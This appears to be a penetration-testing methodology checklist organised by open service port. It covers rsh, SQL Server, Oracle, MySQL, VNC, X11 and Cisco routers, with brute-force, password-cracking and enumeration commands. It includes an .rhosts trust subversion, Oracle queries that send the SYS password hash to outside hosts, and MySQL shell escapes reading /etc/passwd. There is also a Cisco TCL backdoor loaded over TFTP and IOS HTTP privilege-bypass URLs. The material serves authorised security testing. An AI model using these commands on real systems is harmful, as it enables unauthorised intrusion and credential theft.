#
Find the files
*
find / -name .rhosts
*
locate .rhosts
#
Examine Files
*
cat .rhosts
#
Manual Login
*
rlogin hostname -l username
*
rlogin
#
Subvert the files
*
echo ++ > .rhosts
+
Rlogin Brute force
#
Hydra User Link
o
rsh port 514 open
+ full-1
Rsh Enumeration
#
rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
+ full-2
Rsh Brute Force
#
rsh-grind User Link
#
Hydra User Link
#
medusa User Link
o
SQL Server Port 1433 1434 open
+ full-1
SQL Enumeration
#
piggy User Link
#
SQLPing User Link
*
sqlping ip_address/hostname
#
SQLPing2 User Link
#
SQLPing3 User Link
#
SQLpoke User Link
#
SQL Recon User Link
#
SQLver User Link
+ full-2
SQL Brute Force
#
SQLPAT User Link
*
sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
*
sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
#
SQL Dict User Link
#
SQLAT User Link
#
Hydra User Link
#
SQLlhf User Link
#
ForceSQL User Link
o
Citrix port 1494 open
+ full-1
Citrix Enumeration
#
Default Domain
#
Published Applications
*
./citrix-pa-scan {IP_address/file | - | random} [timeout]
*
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP] User Link
+ full-2
Citrix Brute Force
#
bforce.js User Link
#
connect.js User Link
#
Citrix Brute-forcer User Link
#
Reference Material
*
Hacking Citrix – the lame way User Link
*
Hacking Citrix – the forceful way User Link
o
Oracle Port 1521 Open
+ full-1
Oracle Enumeration
#
oracsec User Link
#
Repscan User Link
#
Sidguess User Link
#
Scuba User Link
#
DNS/HTTP Enumeration User Link
*
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
*
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
#
WinSID User Link
#
Oracle default password list User Link
#
TNSVer User Link
*
tnsver host [port]
#
TCP Scan User Link
#
Oracle TNSLSNR User Link
*
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
#
TNSCmd User Link
*
perl tnscmd.pl -h ip_address
*
perl tnscmd.pl version -h ip_address
*
perl tnscmd.pl status -h ip_address
*
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
#
LSNrCheck User Link
#
Oracle Security Check (needs credentials) User Link
#
OAT User Link
*
sh opwg.sh -s ip_address
*
opwg.bat -s ip_address
*
sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p password -d SID
#
OScanner User Link
*
sh oscanner.sh -s ip_address
*
oscanner.exe -s ip_address
*
sh reportviewer.sh oscanner_saved_file.xml
*
reportviewer.exe oscanner_saved_file.xml
#
NGS Squirrel for Oracle User Link
#
Service Register User Link
*
Service-register.exe ip_address
#
PLSQL Scanner 2008 User Link
+ full-2
Oracle Brute Force
#
OAK User Link
*
ora-getsid hostname port sid_dictionary_list
*
ora-auth-alter-session host port sid username password sql
*
ora-brutesid host port start
*
ora-pwdbrute host port sid username password-file
*
ora-userenum host port sid userlistfile
*
ora-ver -e (-f -l -a) host port
#
breakable (Targets Application Server Port) User Link
*
breakable.exe host url [port] [v]
host ip_address of the Oracle Portal Server
url PATH_INFO i.e. /pls/orasso
port TCP port Oracle Portal Server is serving pages from
v verbose
#
SQLInjector (Targets Application Server Port) User Link
*
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
*
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
#
Check Password User Link
#
orabf User Link
*
orabf [hash]:[username] [options]
#
thc-orakel User Link
*
Cracker
*
Client
*
Crypto
#
DBVisualisor User Link
*
Sql scripts from pentest.co.uk User Link
*
Manual SQL input of previously reported vulnerabilities
+ full-3
Oracle Reference Material
#
Understanding SQL Injection User Link
#
SQL Injection walkthrough User Link
#
SQL Injection by example User Link
#
Advanced SQL Injection in Oracle databases User Link
#
Blind SQL Injection User Link
#
SQL Cheatsheets
*
http://ha.ckers.org/sqlinjection
*
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
*
http://www.0x000000.com/?i=14
*
http://pentestmonkey.net/
o
NFS Port 2049 open
+ full-1
NFS Enumeration
#
showmount -e hostname/ip_address
#
mount -t nfs ip_address:/directory_found_exported /local_mount_point
+ full-2
NFS Brute Force
#
Interact with NFS share and try to add/delete
#
Exploit and Confuse Unix User Link
+ full-3
Examine Configuration Files
#
/etc/exports
#
/etc/lib/nfs/xtab
o
Compaq/HP Insight Manager Ports 2301, 2381 open
+ full-1
HP Enumeration
#
Authentication Method
*
Host OS Authentication
*
Default Authentication
o
Default Passwords User Link
#
Wikto User Link
#
Nstealth User Link
+ full-2
HP Bruteforce
#
Hydra User Link
#
Acunetix User Link
+ full-3
Examine Configuration Files
#
path.properties
#
mx.log
#
CLIClientConfig.cfg
#
database.props
#
pg_hba.conf
#
jboss-service.xml
#
.namazurc
o
MySQL port 3306 open
+
Enumeration
#
nmap -A -n -p3306
#
nmap -A -n -PN --script=all -p3306
#
telnet IP_Address 3306
#
use test; select * from test;
#
To check for other DBs: show databases;
+
Administration
#
MySQL Network Scanner User Link
#
MySQL GUI Tools User Link
#
mysqlshow
#
mysqlbinlog
+
Manual Checks
#
Default usernames and passwords
*
username: root password:
*
testing
o
mysql -h -u root
o
mysql -h -u root
o
mysql -h -u root@localhost
o
mysql -h
o
mysql -h -u ""@localhost
#
Configuration Files
*
Operating System
o
windows
+
config.ini
+
my.ini
#
\windows\my.ini
#
\winnt\my.ini
+
/mysql/data/
o
unix
+
my.cnf
#
/etc/my.cnf
#
/etc/mysql/my.cnf
#
/var/lib/mysql/my.cnf
#
~/.my.cnf
#
/etc/my.cnf
*
Command History
o
~/.mysql.history
*
Log Files
o
connections.log
o
update.log
o
common.log
*
To run many SQL commands at once: mysql -u username -p < manycommands.sql
*
MySQL data directory (Location specified in my.cnf)
o
Parent dir = data directory
o
mysql
o
test
o
information_schema (Key information in MySQL)
+
Complete table list: select table_schema,table_name from tables;
+
Exact privileges: select grantee, table_schema, privilege_type FROM schema_privileges;
+
File privileges: select user,file_priv from mysql.user where user='root';
+
Version: select version();
+
Load a specific file: SELECT LOAD_FILE('FILENAME');
*
SSL Check
o
mysql> show variables like 'have_openssl';
+
If no rows are returned at all, the distribution itself does not support SSL connections and probably needs to be recompiled. If the value is DISABLED, the service simply was not started with SSL, which is easily fixed.
#
Privilege Escalation
*
Current Level of access
o
mysql> select user();
o
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
*
Access passwords
o
mysql> use mysql
o
mysql> select user,password from user;
*
Create a new user and grant him privileges
o
mysql> create user test identified by 'test';
o
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
*
Break into a shell
o
mysql> \! cat /etc/passwd
o
mysql> \! bash
+
SQL injection
#
mysql-miner.pl User Link
*
mysql-miner.pl http://target/ expected_string database
#
http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
#
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
+
References.
#
Design Weaknesses
*
MySQL running as root
*
Exposed publicly on Internet
#
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
#
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
o
RDesktop port 3389 open
+ full-1
Rdesktop Enumeration
#
Remote Desktop Connection
+ full-2
Rdesktop Brute Force
#
TSGrinder User Link
*
tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
#
Tscrack User Link
o
Sybase Port 5000+ open
+ full-1
Sybase Enumeration
#
sybase-version ip_address from NGS
+ full-2
Sybase Vulnerability Assessment
#
Use DBVisualiser User Link
*
Sybase Security checksheet User Link
o
Copy output into excel spreadsheet
o
Evaluate mis-configured parameters
*
Manual SQL input of previously reported vulnerabilities
o
Advanced SQL Injection in SQL Server User Link
o
More Advanced SQL Injection User Link
#
NGS Squirrel for Sybase User Link
o
SIP Port 5060 open
+ full-1
SIP Enumeration
#
netcat User Link
*
nc IP_Address Port
#
Sipscan User Link
#
smap User Link
*
smap IP_Address/Subnet_Mask
*
smap -o IP_Address/Subnet_Mask
*
smap -l IP_Address
+ full-2
SIP Packet Crafting etc.
#
sipsak User Link
*
Tracing paths: sipsak -T -s sip:username@domain
*
Options request: sipsak -vv -s sip:username@domain
*
Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
#
siprogue User Link
+ full-3
SIP Vulnerability Scanning/ Brute Force
#
tftp bruteforcer User Link
*
Default dictionary file User Link
*
./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
#
VoIPaudit User Link
#
SiVuS User Link
+ full-4
Examine Configuration Files
#
SIPDefault.cnf
#
asterisk.conf
#
sip.conf
#
phone.conf
#
sip_notify.conf
#
.cfg
#
000000000000.cfg
#
phone1.cfg
#
sip.cfg etc. etc.
o
VNC port 5900^ open
+ full-1
VNC Enumeration
#
Scans
*
5900^ for direct access.
5800 for HTTP access.
+ full-2
VNC Brute Force
#
Password Attacks
*
Remote
o
Password Guess
+
vncrack User Link
o
Password Crack
+
vncrack User Link
+
Packet Capture
#
Phoss
http://www.phenoelit.de/phoss
*
Local
o
Registry Locations
+
HKEY_CURRENT_USER\Software\ORL\WinVNC3
+
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
o
Decryption Key
+
0x238210763578887
+ full-3
Examine Configuration Files
#
.vnc
#
/etc/vnc/config
#
$HOME/.vnc/config
#
/etc/sysconfig/vncservers
#
/etc/vnc.conf
o
X11 port 6000^ open
+ full-1
X11 Enumeration
#
List open windows
#
Authentication Method
*
Xauth
*
Xhost
+ full-2
X11 Exploitation
#
xwd
*
xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
#
Keystrokes
*
Received
*
Transmitted
#
Screenshots
#
xhost +
+ full-3
Examine Configuration Files
#
/etc/Xn.hosts
#
/usr/lib/X11/xdm
*
Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
#
/usr/lib/X11/xdm/xsession
#
/usr/lib/X11/xdm/xsession-remote
#
/usr/lib/X11/xdm/xsession.0
#
/usr/lib/X11/xdm/xdm-config
*
DisplayManager*authorize:on
o
Tor Port 9001, 9030 open
+
Tor Node Checker
#
Ip Pages User Link
#
Kewlio.net User Link
+
nmap NSE script
o
Jet Direct 9100 open
+
hijetta User Link
*
Password cracking
o
Rainbow crack User Link
+
ophcrack User Link
+
rainbow tables
#
rcrack c:\rainbowcrack\*.rt -f pwfile.txt
o
Ophcrack User Link
o
Cain & Abel User Link
o
John the Ripper User Link
+
./unshadow passwd shadow > file_to_crack
+
./john -single file_to_crack
+
./john -w=location_of_dictionary_file -rules file_to_crack
+
./john -show file_to_crack
+
./john --incremental:All file_to_crack
o
fgdump User Link
+
fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
o
pwdump6 User Link
+
pwdump [-h][-o][-u][-p] machineName
o
medusa User Link
o
LCP User Link
o
L0phtcrack (Note: this tool was acquired by Symantec from @stake and it is their policy not to ship it outside the USA and Canada)
+
Domain credentials
+
Sniffing
+
pwdump import
+
sam import
o
aiocracker User Link
+
aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
*
Vulnerability Assessment: utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released, and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
o
Manual
+
Patch Levels
+
Confirmed Vulnerabilities
#
Severe
#
High
#
Medium
#
Low
o
Automated
+
Reports
+
Vulnerabilities
#
Severe
#
High
#
Medium
#
Low
o
Tools
+ full-1
GFI User Link
+ full-2
Nessus (Linux) User Link
#
Nessus (Windows) User Link
+ full-3
NGS Typhon User Link
+ full-4
NGS Squirrel for Oracle User Link
+ full-5
NGS Squirrel for SQL User Link
+
SARA User Link
+
MatriXay User Link
+
BiDiBlah User Link
+
SSA User Link
+
Oval Interpreter User Link
+
Xscan User Link
+
Security Manager + User Link
+
Inguma User Link
o
Resources
+
Security Focus User Link
+
Microsoft Security Bulletin User Link
+
Common Vulnerabilities and Exploits (CVE) User Link
+
National Vulnerability Database (NVD) User Link
+
The Open Source Vulnerability Database (OSVDB) User Link
#
Standalone Database User Link
*
Update URL User Link
+
United States Computer Emergency Response Team (US-CERT) User Link
+
Computer Emergency Response Team User Link
+
Mozilla Security Information User Link
+
SANS User Link
+
Securiteam User Link
+
PacketStorm Security User Link
+
Security Tracker User Link
+
Secunia User Link
+
Vulnerabilities.org User Link
+
ntbugtraq User Link
+
Wireless Vulnerabilities and Exploits (WVE) User Link
o
Blogs
+
Metasploit User Link
+
Software Vulnerability Exploitation Blog User Link
+
Jeremiah Grossman Blog User Link
+
nCircle Blogs User Link
+
Fsecure Blog User Link
+
g0ne blog User Link
+
MC Blog User Link
+
Security Fix Blog User Link
+
Rise Security User Link
+
Rational Security User Link
+
pentestmonkey.net User Link
+
GNUCitizen User Link
+
ha.ckers Blog User Link
+
Taosecurity Blog User Link
*
Network Backbone
o
Generic Toolset
+
Wireshark (Formerly Ethereal) User Link
#
Passive Sniffing
*
Usernames/Passwords
*
Email
o
POP3
o
SMTP
o
IMAP
*
FTP
*
HTTP
*
HTTPS
*
RDP
*
VOIP
*
Other
#
Filters
*
ip.src == ip_address
*
ip.dst == ip_address
*
tcp.dstport == port_no.
*
! ip.addr == ip_address
*
(ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
+
Cain & Abel User Link
#
Active Sniffing
*
ARP Cache Poisoning
o
Usernames/Passwords
o
Email
+
POP3
+
SMTP
+
IMAP
o
FTP
o
HTTP
o
HTTPS
o
RDP
o
VOIP
o
Other
*
DNS Poisoning
*
Routing Protocols
+
Cisco-Torch User Link
#
./cisco-torch.pl or ./cisco-torch.pl -F
+
NTP-Fingerprint User Link
#
perl ntp-fingerprint.pl -t [ip_address]
+
Yersinia User Link
+
p0f User Link
#
./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
+
Manual Check (Credentials required)
+
MAC Spoofing
#
mac address changer for windows User Link
#
macchanger User Link
*
Random MAC address: macchanger -r eth0
#
madmacs User Link
#
smac User Link
#
TMAC User Link
o
Bluetooth Specific Tools
+
Bluescanner User Link
+
Bluesweep User Link
+
btscanner User Link
+
Redfang User Link
+
Blueprint User Link
+
Bluesnarfer User Link
+
Bluebugger User Link
#
bluebugger [OPTIONS] -a [MODE]
+
Blueserial User Link
+
Bloover User Link
+
Bluesniff User Link
+
Resources
#
URLs
*
BlueStumbler.org User Link
*
Bluejackq.com User Link
*
Bluejacking.com User Link
*
Bluejackers User Link
*
bluetooth-pentest User Link
*
ibluejackedyou.com User Link
*
Trifinite User Link
*
Common Vulnerabilities and Exploits (CVE)
o
Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
#
White Papers
*
Bluesnarfing User Link
+
Exploit Frameworks
#
BlueMaho User Link
*

# atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
# bccmd by Marcel Holtmann
# bdaddr.c by Marcel Holtmann
# bluetracker.py by smiley
# psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
# BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
# btftp v0.1 by Marcel Holtmann
# btobex v0.1 by Marcel Holtmann
# greenplaque v1.5 by digitalmunition.com
# L2CAP packetgenerator by Bastian Ballmann
# redfang v2.50 by Ollie Whitehouse
# ussp-push v0.10 by Davide Libenzi
# exploits:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Nokia N70 l2cap packet DoS PoC by Pierre Betouin
Sony-Ericsson reset display PoC by Pierre Betouin
o
Cisco Specific Testing
+
Methodology
# full-1
Scan & Fingerprint.
*
The purpose of 'Scan & Fingerprint' is to identify open ports on the target device and attempt to determine the exact IOS version. This then sets the plan for further attacks.
*
If Telnet is active, then password guessing attacks should be performed.
*
If SNMP is active, then community string guessing should be performed.
# full-2
Credentials Guessing.
*
If a network engineer/administrator has configured just one Cisco device with a poor password, then the whole network is open to attack. Attempting to connect with various usernames/passwords is a mandatory step in testing the level of security that the device offers.
*
Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings, as they can lead to the config files of the router and therefore the 'enable' password!
# full-3
Connect
*
Once you have identified the access credentials, whether that be HTTP, Telnet or SSH, then connect to the target device to identify further information.
*
If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
# full-4
Check for bugs
*
To check for known bugs, vulnerabilities or security flaws with the device, a good security scanner should be used.
o
The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.
o
There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
# full-5
Further your attack
*
To further the attack into the target network, some changes need to be made to the running-config file of the target device. There are two main categories of configuration file on Cisco routers: running-config and startup-config:
o
running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration file is editable and changes take effect immediately, but they are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
o
startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
*
Once you have access to the config files (you will need enable, i.e. privileged mode, access for this), you can add an access-list rule to allow your IP address into the internal network. The following ACL will allow the defined access to any internal IP address. So if the router is protecting a web server and an email server, this ACL will allow you to pass packets to those IP addresses on any port. Therefore you should be able to port scan them efficiently.
o
#> access-list 100 permit ip any
+ full-1
Scan & Fingerprint.
#
Port Scanning
*
nmap
o
To effectively scan a Cisco device, both TCP and UDP ports across the whole range must be checked. There are a number of tools that can achieve the goal, however we will stick with nmap examples.
+
TCP scan: this will perform a TCP connect scan, OS fingerprint, be verbose, scan ports 1-65535 against IP 10.1.1.1 and output the results in normal mode to the file TCP.scan.txt: nmap -sT -O -v -p 1-65535 -oN TCP.scan.txt 10.1.1.1
+
UDP scan: this will perform a UDP scan, be verbose, scan ports 1-65535 against IP 10.1.1.1 and output the results in normal mode to the file UDP.scan.txt: nmap -sU -v -p 1-65535 -oN UDP.scan.txt 10.1.1.1
*
Other tools
o
ciscos is a scanner for discovering Cisco devices in a given CIDR network range.
+
Usage: ./ciscos [option]
o
mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
#
Fingerprinting
*
cisco-torch is a fingerprinter for Cisco routers. There are a number of different fingerprinting switches, such as SSH, Telnet or HTTP. The -A switch should perform all scans, however I have found it to be unreliable.
o
BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
+
List of targets contains 1 host(s) 14489:
Checking 10.1.1.175 ...
Fingerprint:2552511255251325525324255253311310
Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP)
Fingerprinting Successful
+
Cisco-IOS Webserver found
HTTP/1.1 401 Unauthorized
Date: Mon, 01 Mar 1993 00:34:11 GMT
Server: cisco-IOS
Accept-Ranges: none
WWW-Authenticate: Basic realm="level_15_access"
401 Unauthorized
*
nmap version scan: once open ports have been identified, version scanning should be performed against them. In this example, TCP ports 23 and 80 were found to be open.
o
TCP port scan: nmap -sV -O -v -p 23,80 -oN TCP.version.txt
o
UDP port scan: nmap -sU -sV -v -p 161,162 -oN UDP.version.txt
+ full-2
Password Guessing.
#
CAT (Cisco Auditing Tool): this tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.
*
./CAT -h -a password.wordlist
*
BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
Guessing passwords:
Invalid Password: 1234
Invalid Password: 2read
Invalid Password: 4changes
Password Found: telnet
#
brute-enabler is an internal enable password guesser. You require valid non-privileged mode credentials to use this tool; they can be either SSH or Telnet.
*
./enabler [-u username] -p password /password.wordlist [port]
*
BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt
[`] OrigEquipMfr... wrong password
[`] Cisco... wrong password
[`] agent... wrong password
[`] all... wrong password
[`] possible password found: cisco
#
hydra: hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet, which may only require a password. (Make sure that you limit the threads to 4 (-t 4), as more will just overload the Telnet server!)
*
BT tmp # hydra -l "" -P password.wordlist -t 4 cisco
*
Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10
[DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per task
[DATA] attacking service cisco on port 23
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
[STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
[23][cisco] host: 10.1.1.175 login: password: telnet
+ full-2
SNMP Attacks.
#
CAT (Cisco Auditing Tool): this tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.
*
./CAT -h -w SNMP.wordlist
*
BT cisco-auditing-tool-v.1.0# CAT -h 10.1.1.175 -w /tmp/snmp.txt
Checking Host: 10.1.1.175
Guessing passwords:
Invalid Password: cisco
Invalid Password: ciscos
Guessing Community Names:
Invalid Community Name: CISCO
Invalid Community Name: OrigEquipMfr
Community Name Found: Cisco
#
onesixtyone is a reliable SNMP community string guesser. Once it identifies the correct community string, it will display accurate fingerprinting information.
*
onesixtyone -c SNMP.wordlist
*
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
#
snmpwalk: snmpwalk is part of the SNMP toolkit. After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information. Ensure that you use the correct version of the SNMP protocol in use or it will not work correctly. It may be a good idea to redirect the output to a text file for easier viewing, as the tool outputs a large amount of text.
*
snmpwalk -v -c
*
BT# snmpwalk -v 1 -c enable 10.1.1.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: router
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 78
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
IF-MIB::ifNumber.0 = INTEGER: 4
+ full-3
Connecting.
#
Telnet
*
The telnet service on Cisco devices can authenticate users based upon a password in the config file or against a RADIUS or TACACS server. If the device is simply using a VTY configuration for Telnet access, then it is likely that only a password is required to log on. If the device is passing authentication details to a RADIUS or TACACS server, then a combination of username and password will be required.
o
telnet
o
Sample Banners
+
VTY configuration:
BT / # telnet 10.1.1.175
Trying 10.1.1.175...
Connected to 10.1.1.175.
Escape character is '^]'.
User Access Verification
Password:
router>
+
External authentication server:
BT / # telnet 10.1.1.175
Trying 10.1.1.175...
Connected to 10.1.1.175.
Escape character is '^]'.
User Access Verification
Username: admin
Password:
router>
#
SSH
#
Web Browser
*
HTTP/HTTPS: web based access can be achieved via a simple web browser, as long as the HTTP administration service is active on the target device:
o
This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
o
Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:
o
Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
+
Cisco Systems
Accessing Cisco 2610 "router"
#
Show diagnostic log – display the diagnostic log.
#
Monitor the router – HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
#
Show tech-support - display information commonly needed by tech support.
#
Extended Ping - send extended ping commands.
#
VPN Device Manager (VDM) – Configure and monitor Virtual Private Networks (VPNs) through the web interface.
#
TFTP
*
Trivial File Transfer Protocol is used to back up the config files of the router. Should an attacker discover the enable password or the RW SNMP community string, the config files are easy to retrieve.
o
Cain & Abel - Cisco Configuration Download/Upload (CCDU): given the RW community string and the version of SNMP in use, this tool can download the running-config file to your local system.
o
ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
*
There are ways of extracting the config files directly from the router even if the names have changed; however, you are then limited to dictionary based attacks and by the speed of the TFTP server. cisco-torch is one of the tools that will do this. It will attempt to retrieve the config files listed in the brutefile.txt file:
o
./cisco-torch.pl
o
./cisco-torch.pl -F
o
Creating backdoors in Cisco IOS using TCL User Link
+
en
router
source tftp tftp:///tclshell_ios.tcl
+
telnet :Port
+
tclshell User Link
+ full-4
Known Bugs.
#
Attack Tools
*
Cisco Global Exploiter (CGE-13): CGE is an attempt to combine all of the Cisco attacks into one tool.
o
perl cge.pl
+
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
+
[2] - Cisco IOS Router Denial of Service Vulnerability
+
[3] - Cisco IOS HTTP Auth Vulnerability
+
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
+
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
+
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
+
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
+
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
+
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
+
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
+
[11] - Cisco Catalyst Memory Leak Vulnerability
+
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
+
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
+
[14] - Cisco IOS HTTP Denial of Service Vulnerability
*
HTTP Arbitrary Access vulnerability: a common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability. This flaw allowed an external attacker to execute router commands via the web interface. Cisco devices have a number of privilege levels; these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode. By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privileged EXEC mode.
o
Web browse to the Cisco device: http://
o
Click cancel at the logon box and enter the following address:
+
http:///level/99/exec/show/config (You may have to scroll through all of the levels from 16-99 for this to work.)
o
To raise the logging level to only log emergencies:
+
http:///level/99/configure/logging/trap/emergencies/CR
o
To add a rule to allow Telnet:
+
http:///level/99/configure/access-list/100/permit/ip/host//any/CR
*
ios-w3-vuln: a CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack; the tool is called ios-w3-vuln (although it may have other names). As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP the running-config file to a TFTP server running locally.
o
./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
#
Common Vulnerabilities and Exploits (CVE) Information
*
Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
+ full-5
Configuration Files.

#

Configuration Files.
The relevant configuration files that control a Cisco router have already been covered in Methodology | (5) Further your attack. In the child to this entry is a sample running-config file from a Cisco 2600 router running IOS version 12.2.
* Configuration files explained
o The line that reads “enable password router”, where “router” is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
o Telnet Access. If telnet is configured on the VTY (Virtual TTY) interface, then the credentials will be in the config file:
  line vty 0 4
  password telnet
  login
o SNMP Settings. If the target router is configured to use SNMP, then the SNMP community strings will be in the config file. It should have the read-only (RO) and may have the read-write (RW) strings:
  snmp-server community Cisco RO
  snmp-server community enable RW
o Password Encryption Utilised
+ Enable password. The Holy Grail, the ‘enable’ password, the root level access to the router. There are two main methods of storing the enable password in a config file, type 5 and type 7, MD5 hashed and Vigenère encrypted respectively. An example is: enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
# Type 7 should be avoided as it is extremely easy to crack; it can even be done by hand! An example Type 7 password (not present in the sample running-config file) is: enable password 7 104B0718071B17; they can be cracked with the following tools:
* Boson GetPass
* Cain
* Online cracking
